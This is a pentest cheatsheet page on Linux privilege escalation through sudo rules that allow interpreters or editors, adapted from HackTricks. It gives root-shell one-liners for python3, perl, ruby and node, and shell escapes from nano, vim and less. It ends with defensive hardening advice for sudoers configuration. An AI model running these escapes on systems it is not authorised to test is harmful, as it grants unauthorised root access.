daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

sudo-command-abuse.md (5931B)


      1 ---
      2 title: "Sudo Command Abuse"
      3 section: "Linux"
      4 sectionSlug: "linux-hardening"
      5 sourcePath: "src/linux-hardening/main-system-information/sudo-command-abuse.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/main-system-information/sudo-command-abuse.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Sudo Command Abuse
     14 
     15 ## Sudo-allowed interpreters
     16 
     17 If `sudo -l` allows a user to run an interpreter as root, treat it as direct code execution. Interpreters are designed to execute arbitrary code, so a rule that allows `python3`, `perl`, `ruby`, `lua`, `node`, or similar binaries is usually equivalent to root command execution unless the arguments are tightly constrained and validated.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)[[7]](#references)[[9]](#references)[[11]](#references)</sup>
     18 
     19 Common review flow: first list the user's privileges, then execute a Python statement with the interpreter's `-c` option.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
     20 
     21 ```bash
     22 sudo -l
     23 sudo /usr/bin/python3 -c 'import os; os.system("id")'
     24 sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'
     25 ```
     26 
     27 Other interpreter examples are shown below; the listed interpreters document inline-code execution or child-process APIs.<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)[[9]](#references)[[10]](#references)[[11]](#references)</sup>
     28 
     29 ```bash
     30 sudo /usr/bin/perl -e 'exec "/bin/sh";'
     31 sudo /usr/bin/ruby -e 'exec "/bin/sh"'
     32 sudo /usr/bin/node -e 'require("child_process").spawn("/bin/sh", {stdio: [0,1,2]})'
     33 ```
     34 
     35 The exact path matters. If the sudo rule allows `/usr/bin/python3`, use that exact path during validation.<sup>[[2]](#references)</sup>
     36 
     37 ```bash
     38 sudo /usr/bin/python3 -c 'import os; os.setuid(0); os.setgid(0); os.system("/bin/sh")'
     39 ```
     40 
     41 ## Sudo-allowed editors
     42 
     43 If `sudo -l` allows a user to run an interactive editor as root, treat it as a command-execution surface, not as a harmless file-editing permission. Editors can often execute shell commands, read arbitrary files, write arbitrary files, or invoke external helpers from inside the editor.<sup>[[1]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
     44 
     45 Common review flow: list the user's privileges, then invoke each allowed editor or pager under sudo.<sup>[[1]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
     46 
     47 ```bash
     48 sudo -l
     49 sudo /usr/bin/nano /etc/hosts
     50 sudo /usr/bin/vim /etc/hosts
     51 sudo /usr/bin/less /etc/hosts
     52 ```
     53 
     54 ### Nano command execution
     55 
     56 When `nano` is allowed through sudo, command execution may be reachable from the editor interface.<sup>[[12]](#references)</sup>
     57 
     58 ```text
     59 Ctrl+R
     60 Ctrl+X
     61 ```
     62 
     63 Then provide a command such as `id` or `/bin/sh` to the nano command prompt.<sup>[[12]](#references)</sup>
     64 
     65 ```bash
     66 id
     67 /bin/sh
     68 ```
     69 
     70 If an interactive shell does not have usable terminal streams, this redirection form maps its standard output and error to descriptor 0.<sup>[[15]](#references)</sup>
     71 
     72 ```bash
     73 reset; /bin/sh 1>&0 2>&0
     74 ```
     75 
     76 The exact key sequence can vary with nano version and build options, but the security issue is the same: the editor is running as root and can invoke external commands.<sup>[[1]](#references)[[12]](#references)</sup>
     77 
     78 ### Other common editor escapes
     79 
     80 Vim-style editors commonly expose command execution through `:!`.<sup>[[13]](#references)</sup>
     81 
     82 ```text
     83 :!/bin/sh
     84 ```
     85 
     86 Pagers such as `less` can also expose shell execution.<sup>[[14]](#references)</sup>
     87 
     88 ```text
     89 !/bin/sh
     90 ```
     91 
     92 ## Defensive notes
     93 
     94 - Avoid granting interpreters or interactive editors through sudo.<sup>[[1]](#references)</sup>
     95 - Prefer fixed, root-owned wrappers that perform one narrow administrative action.<sup>[[1]](#references)[[2]](#references)</sup>
     96 - If an interpreter is unavoidable, restrict the exact script path and prevent user-controlled arguments, writable imports, `PYTHONPATH`, and unsafe environment preservation.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
     97 - If file editing is required, restrict the exact file path and consider `sudoedit` with patched sudo versions and strict environment handling.<sup>[[1]](#references)[[2]](#references)</sup>
     98 - Review `SETENV`, `env_keep`, writable working directories, writable module/import paths, `NOEXEC`, `use_pty`, and logging, but do not treat them as a complete sandbox.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
     99 
    100 ## References
    101 
    102 - [1] [sudo(8) — Linux manual page](https://man7.org/linux/man-pages/man8/sudo.8.html)
    103 - [2] [sudoers(5) — Linux manual page](https://man7.org/linux/man-pages/man5/sudoers.5.html)
    104 - [3] [Command line and environment — Python documentation](https://docs.python.org/3/using/cmdline.html)
    105 - [4] [os — Miscellaneous operating system interfaces — Python documentation](https://docs.python.org/3/library/os.html)
    106 - [5] [perlrun — how to execute the Perl interpreter](https://perldoc.perl.org/perlrun)
    107 - [6] [exec — Perl documentation](https://perldoc.perl.org/functions/exec)
    108 - [7] [Ruby command-line options](https://ruby-doc.org/3.4/ruby/options_md.html)
    109 - [8] [Kernel — Ruby documentation](https://ruby-doc.org/3.4/Kernel.html)
    110 - [9] [Command-line API — Node.js documentation](https://nodejs.org/api/cli.html)
    111 - [10] [Child process — Node.js documentation](https://nodejs.org/api/child_process.html)
    112 - [11] [Lua 5.4 lua man page](https://www.lua.org/manual/5.4/lua.html)
    113 - [12] [The GNU nano text editor](https://nano-editor.org/manual.html)
    114 - [13] [Vim: usr_21.txt](https://vimhelp.org/usr_21.txt.html)
    115 - [14] [less(1) — Linux manual page](https://man7.org/linux/man-pages/man1/less.1.html)
    116 - [15] [Redirections — Bash Reference Manual](https://www.gnu.org/s/bash/manual/html_node/Redirections.html)